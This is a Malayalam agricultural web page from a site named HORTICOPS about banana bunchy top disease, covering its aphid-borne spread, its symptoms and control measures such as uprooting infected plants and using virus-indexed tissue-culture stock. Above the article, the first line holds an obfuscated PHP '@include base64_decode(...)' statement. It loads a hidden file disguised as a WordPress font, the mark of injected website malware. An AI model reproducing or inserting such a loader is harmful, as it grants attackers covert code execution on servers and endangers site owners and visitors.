@include base64_decode("L2hvbWUvaHl6dmh2cGcvaG9ydGljb3BzLmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); വാഴ രോഗത്തെ കുറിച്ച് കൂടുതൽ അറിയാം | HORTICOPS

വാഴ രോഗത്തെ കുറിച്ച് കൂടുതൽ അറിയാം

കുറുനാമ്പ്, നാക്കടപ്പൻ, കട്ടയിടൽ, മണ്ടയടപ്പ്, കുരലടപ്പ്, ആയിരം കൂമ്പ് അങ്ങനെ പല പേരുകളിൽ അറിയപ്പെടുന്ന വാഴ രോഗംത്തെ കുറിച്ച് നമുക്ക് കൂടുതൽ അറിയാം

വാഴപ്പേനുകള്‍ പരത്തുന്ന വൈറസ് രോഗമാണ്ഇത്. വൈറസ് ബാധിച്ച വാഴയില്‍ 25-30 ദിവസം കഴിയുമ്പോള്‍ രോഗലക്ഷണംകണ്ടുതുടങ്ങും. വിരിഞ്ഞുവരുന്ന ഇലകള്‍ ചുരുങ്ങി, തിങ്ങിഞെരുങ്ങികൂമ്പടഞ്ഞുപോകും. രോഗബാധിതമായ വാഴ പിഴുതു നശിപ്പിക്കുക, രോഗബാധയില്ലാത്തതോട്ടങ്ങളില്‍നിന്നു മാത്രം കന്നുകള്‍ എടുക്കുക, കീടനാശിനികള്‍ ഉപയോഗിച്ച് വാഴപ്പേനുകള്‍ നശിപ്പിക്കുക എന്നിവയാണ് പരിഹാരമാര്‍ഗങ്ങള്‍.

രോഗലക്ഷണങ്ങൾ

കടും പച്ചനിറത്തില്‍ ഇടവിട്ടുള്ള വരകള്‍ ഇലത്തണ്ടിലും ഞരമ്പുകളിലും കവിളിലും തണ്ടിലും കാണുതാണ് പ്രാരംഭലക്ഷണം.

ഇല്കള്‍ മുകളിലേയ്ക്കു ചുരുളുന്നു

ഇലയ്ക്ക് സാധാരണയില്‍ കവിഞ്ഞ് കടും പച്ച നിറവും കട്ടിയും കാണുന്നു..

പുതുതായി ഉണ്ടാകുന്ന ഇലകള്‍ ചെറുതായി തിങ്ങി ഞെരുങ്ങി കൂമ്പടയുതാണ് പ്രധാനലക്ഷണം.

രോഗബാധിതമായ വാഴയുടെ ചുവട്ടിലുണ്ടാകുന്ന പുതിയ കുന്നുകളും കുരുടിക്കുന്നു.

നിയന്ത്രണ മാര്‍ഗങ്ങള്‍

വൈറസ് രോഗങ്ങളുടെ ഉറവിടം നശിപ്പിക്കലാണ് ഏറ്റവും പ്രധാനം.കാരണം വൈറസ് കൾക്ക് ശാസ്ത്രം ഇതു വരെ മരുന്ന് കണ്ടു പിടിച്ചിട്ടില്ല. രോഗം ബാധിച്ച വാഴ വേരോടെ പിഴുത് തീയിട്ടു നശിപ്പിക്കുകയോ കുഴിച്ചു മൂടുകയോ ചെയ്യുക.

രോഗം ബാധിച്ച വാഴകളുടെ കുന്നുകള്‍ ഒരിക്കലും നടാന്‍ ഉപയോഗിക്കരുത്.

രോഗബാധയില്ലാത്ത തോട്ടങ്ങളില്‍ നിന്നു മാത്രം വിത്തുകൾ തിരഞ്ഞെടുക്കുക.

ഇടയ്ക്ക് നിരീക്ഷണം നടത്തി തോട്ടത്തിലെ രോഗലക്ഷണം കാണുന്ന വാഴകള്‍ തുടക്കത്തില്‍ തന്നെ ചുവടോടെ പിഴുത് നശിപ്പിക്കുക.

വാഴ നടുമ്പോള്‍ ഒരു കിലോ കുമ്മായവും 200 ഗ്രാം മഗ്നീഷ്യം സള്ഫേ്റ്റും ചേരുക്കുക. (കുമ്മായം ചേര്ത്ത് 3 ആഴ്ച കഴിഞ്ഞേ മഗ്നീഷ്യം സള്ഫേംറ്റ് ചേര്ക്കാ വു).

കുഴിയില്‍ തൈലപ്പുല്ലിന്റെ (ലെമണ്‍ഗ്രാസ്) തണ്ടും ഇലയും വിരിച്ചിട്ട് നടുക.

രോഗവാഹികളായ ഇലപ്പേനിനേയും മീലിമൂട്ടയേയും നിയന്ത്രിക്കുക.

വൈറസ് ഇന്ഡെവക്‌സ് ചെയ്ത ടിഷ്യുകള്ച്ചടര്‍ വാഴകള്‍ നടുക.

പയറുവര്ഗ്ഗെ വിളകളും വെള്ളരിവര്ഗ്ഗ് വിളകളും ഇടവിളയായി കൃഷി ചെയ്യുന്നത് ഒഴിവാക്കുക.

Share Now

Leave a Reply

Your email address will not be published. Required fields are marked *